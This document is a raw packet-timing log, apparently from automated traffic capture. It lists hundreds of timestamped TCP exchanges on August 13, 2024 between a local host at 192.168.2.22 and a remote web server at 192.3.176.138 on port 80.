                                    Aug 13, 2024 20:24:37.747661114 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747663975 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.747715950 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747765064 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747780085 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.747802019 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747806072 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.747836113 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747869968 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747893095 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.747903109 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747906923 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.747936964 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747951031 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.747972012 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.747980118 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748003960 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748023033 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748039007 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748047113 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748071909 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748081923 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748106956 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748115063 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748138905 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748152018 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748174906 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748183966 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748209000 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748218060 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748243093 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748243093 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748276949 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748308897 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748313904 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748323917 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748347998 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748357058 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748383045 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748399973 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748425961 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748436928 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748471022 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748517990 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748518944 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748543978 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748589993 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748594046 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748627901 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748656988 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748662949 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748712063 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748713017 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748749018 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748756886 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748783112 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748799086 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748817921 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748823881 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748851061 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748864889 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748884916 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748891115 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748918056 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748951912 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748966932 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.748985052 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.748991966 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749022007 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749027014 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749056101 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749073982 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749089956 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749123096 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749136925 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749157906 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749159098 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749191046 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749214888 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749231100 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749241114 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749274969 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749284029 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749315977 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749327898 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749361992 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749375105 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749394894 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749422073 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749429941 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749440908 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749476910 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749486923 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749521971 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749567032 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749573946 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749608994 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749631882 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749643087 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749656916 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749686003 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749701977 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749717951 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749749899 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749783039 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749793053 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749814034 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749818087 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749833107 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749854088 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749862909 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749888897 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.749897957 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.749938011 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750123024 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750190020 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750195980 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750241041 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750272989 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750304937 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750320911 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750324011 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750368118 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750375032 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750407934 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750418901 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750442028 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750454903 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750475883 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750488043 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750524044 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750528097 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750560999 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750574112 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750596046 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750598907 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750629902 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750658989 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750668049 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750677109 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750701904 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750730991 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750737906 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750771999 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750772953 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750787973 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750806093 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750819921 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750843048 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.750854015 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.750885963 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751034975 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751068115 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751120090 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751121998 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751156092 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751166105 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751190901 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751207113 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751224041 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751234055 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751270056 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751276970 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751310110 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751332998 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751343966 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751357079 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751379013 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751389027 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751411915 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751422882 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751446009 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751454115 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751478910 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751503944 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751513004 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751519918 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751549006 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751559973 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751578093 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.751602888 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.751621008 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833161116 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833246946 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833281994 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833292961 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833314896 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833332062 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833333015 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833369970 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833424091 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833430052 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833462000 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833487034 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833494902 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833508968 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833547115 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833554983 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833597898 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833607912 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833632946 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833661079 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833682060 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833683014 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833718061 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833739996 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833751917 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833764076 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833801985 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833801985 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833841085 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833856106 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833874941 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833901882 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833923101 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.833928108 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.833981991 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834007025 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834044933 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834069967 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834095001 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834101915 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834130049 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834161997 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834166050 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834177971 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834198952 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834238052 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834254026 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834270954 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834287882 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834323883 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834333897 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834372044 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834374905 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834409952 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834441900 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834441900 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834459066 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834475994 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834491014 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834527016 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834527969 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834562063 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834588051 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834615946 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834618092 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834650993 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834681988 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834683895 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834701061 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834717989 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834744930 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834752083 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834765911 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834800005 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834805012 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834855080 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834856033 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834892035 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834928036 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.834928989 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834944010 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.834963083 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835011005 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835011959 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835047007 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835062981 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835079908 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835095882 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835117102 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835130930 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835150957 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835165024 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835185051 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835213900 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835222006 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835256100 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835256100 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835287094 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835292101 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835320950 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835326910 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835340023 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835361004 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835388899 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835396051 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835413933 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835428953 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835465908 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835475922 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835481882 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835525990 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835526943 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835576057 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835582972 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835609913 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835635900 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835643053 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835654974 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835692883 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835694075 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835728884 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835756063 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835762978 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835781097 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835797071 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835829973 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835850954 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835863113 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835895061 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835897923 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835911036 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835932970 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835967064 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.835974932 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.835995913 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836010933 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836015940 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836050034 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836082935 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836082935 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836097002 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836117029 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836133003 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836152077 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836180925 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836185932 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836194992 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836236954 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836241007 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836272001 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836297035 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836306095 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836330891 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836354017 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836355925 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836396933 CEST8049165192.3.176.138192.168.2.22
                                    Aug 13, 2024 20:24:37.836415052 CEST4916580192.168.2.22192.3.176.138
                                    Aug 13, 2024 20:24:37.836430073 CEST8049165192.3.176.138192.168.2.22
